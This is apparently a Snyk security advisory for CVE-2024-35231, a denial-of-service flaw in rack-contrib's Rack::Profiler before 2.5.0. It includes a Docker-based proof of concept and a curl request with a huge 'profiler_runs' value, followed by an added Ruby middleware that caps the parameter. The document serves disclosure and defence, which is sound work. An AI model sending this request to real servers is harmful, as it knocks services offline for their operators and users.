Allocation of Resources Without Limits or Throttling Affecting rack-contrib package, versions <2.5.0
Snyk ID: SNYK-RUBY-RACKCONTRIB-7148535
- published 28 May 2024
- disclosed 27 May 2024
- credit Sim4n6
Introduced: 27 May 2024
CVE-2024-35231
How to fix?
Upgrade rack-contrib to version 2.5.0 or higher.
Overview
Affected versions of this package are vulnerable to Allocation of Resources Without Limits or Throttling due to the unconstrained value of the incoming profiler_runs parameter. An attacker can cause the server to allocate excessive resources, leading to a denial of service, by sending crafted requests with large profiler_runs values.
PoC
config.ru file:
require 'rack'
require 'rack/contrib'
use Rack::Profiler # if ENV['RACK_ENV'] == 'development'
# Define a Rack application
app = lambda do |env|
  # Your application logic goes here
  [200, {}, ["Hello World"]]
end
# Run the Rack application
run app
A Dockerfile:
# Use the official Ruby image as a base
FROM ruby:latest
# Set the working directory inside the container
WORKDIR /app
# Copy the custom config.ru file into the container
COPY config.ru .
COPY Gemfile .
# Install rack and the gems needed to run the app
RUN bundle install
# Expose the port that rackup will listen on
EXPOSE 9292
# Run rackup when the container starts
ENTRYPOINT ["rackup","--host","0.0.0.0","--port","9292"]
# Health check
HEALTHCHECK --interval=3s --timeout=10s --start-period=2s --retries=3 CMD curl --fail http://localhost:9292/ || exit 1
A Gemfile:
source 'https://rubygems.org'
gem 'rack', '> 2.0'
gem 'rack-contrib', '> 2.4'
gem 'rackup'
gem 'ruby-prof'
A Docker compose:
services:
  app:
    build:
      context: .
    ports:
      - "9292:9292"
To run the PoC:
docker compose up --build
To exploit DoS:
curl "http://127.0.0.1:9292/?profiler_runs=9999999999&profile=process_time"
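The upgrade above is the fix. As an added example (not rack-contrib's own code and not the 2.5.0 patch), the Rack middleware below shows the missing control in isolation: it validates the profiler_runs query parameter and rejects out-of-range values with a 400 before Rack::Profiler ever sees them, so the request from the PoC above is refused instead of being allowed to trigger an unbounded number of profiler runs. The class name ProfilerRunsLimiter, the cap of 10 runs and the stub application are all assumptions made for this example; in the PoC's config.ru it would be inserted as `use ProfilerRunsLimiter, max_runs: 10` on the line before `use Rack::Profiler`.

```ruby
require 'uri'

# Added example, not rack-contrib's own fix: a small Rack middleware that
# validates the profiler_runs query parameter before Rack::Profiler sees it.
# The cap of 10 runs is an assumed value; choose one that fits your own
# profiling needs.
class ProfilerRunsLimiter
  DEFAULT_MAX_RUNS = 10
  PARAM = 'profiler_runs'.freeze

  # Returns true when the parameter is absent or every profiler_runs value in
  # the query string is a plain decimal integer in 1..max_runs. Every
  # occurrence is checked, so a duplicated parameter cannot smuggle a large
  # value past the check. Non-ASCII input makes URI.decode_www_form raise
  # ArgumentError; that is treated as invalid rather than propagated.
  def self.allowed_runs?(query_string, max_runs = DEFAULT_MAX_RUNS)
    pairs = URI.decode_www_form(query_string.to_s)
    pairs.select { |key, _| key == PARAM }
         .all? { |_, value| value.match?(/\A\d+\z/) && value.to_i.between?(1, max_runs) }
  rescue ArgumentError
    false
  end

  def initialize(app, max_runs: DEFAULT_MAX_RUNS)
    @app = app
    @max_runs = max_runs
  end

  # Rack entry point: out-of-range values get a 400 and are never forwarded,
  # so downstream middleware can only be asked for a bounded amount of work.
  def call(env)
    return @app.call(env) if self.class.allowed_runs?(env['QUERY_STRING'], @max_runs)

    body = "#{PARAM} must be an integer between 1 and #{@max_runs}\n"
    [400, { 'content-type' => 'text/plain', 'content-length' => body.bytesize.to_s }, [body]]
  end
end

# Stand-alone demonstration against a stub app (the rack gem is not needed
# here; the env hashes are constructed inline).
if __FILE__ == $PROGRAM_NAME
  stub = ->(_env) { [200, { 'content-type' => 'text/plain' }, ['Hello World']] }
  guarded = ProfilerRunsLimiter.new(stub, max_runs: 10)
  [
    'profile=process_time',
    'profiler_runs=3&profile=process_time',
    'profiler_runs=9999999999&profile=process_time'
  ].each do |qs|
    status, = guarded.call('QUERY_STRING' => qs, 'REQUEST_METHOD' => 'GET')
    puts "#{qs.ljust(48)} -> #{status}"
  end
end
```

Rejecting with 400 rather than silently clamping the value keeps the misuse visible in access logs, which is what you want when deciding whether a spike of such requests is probing or a real client bug.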